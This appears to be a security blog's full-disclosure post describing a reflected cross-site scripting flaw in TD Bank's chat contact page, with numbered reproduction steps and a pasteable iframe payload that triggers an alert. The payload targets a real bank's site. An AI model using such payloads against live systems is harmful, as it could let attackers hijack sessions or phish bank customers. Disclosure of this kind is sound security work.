Thursday, 16 March 2023

Full Disclosure - TDBank Reflected Cross Site Script

 Application

  • TDBank chat web page


Information

  • Input not validated
  • Reflect Cross Site Scripting flaw


Exploit

XSS #1

1. Browse to Online Store

1. Browse to Personal Banking -> Contact Us

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>



at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description - It was noted that the admin functionality was vulnerable to Blind SQL injection SQL Injection in Admin Functionality Steps to ...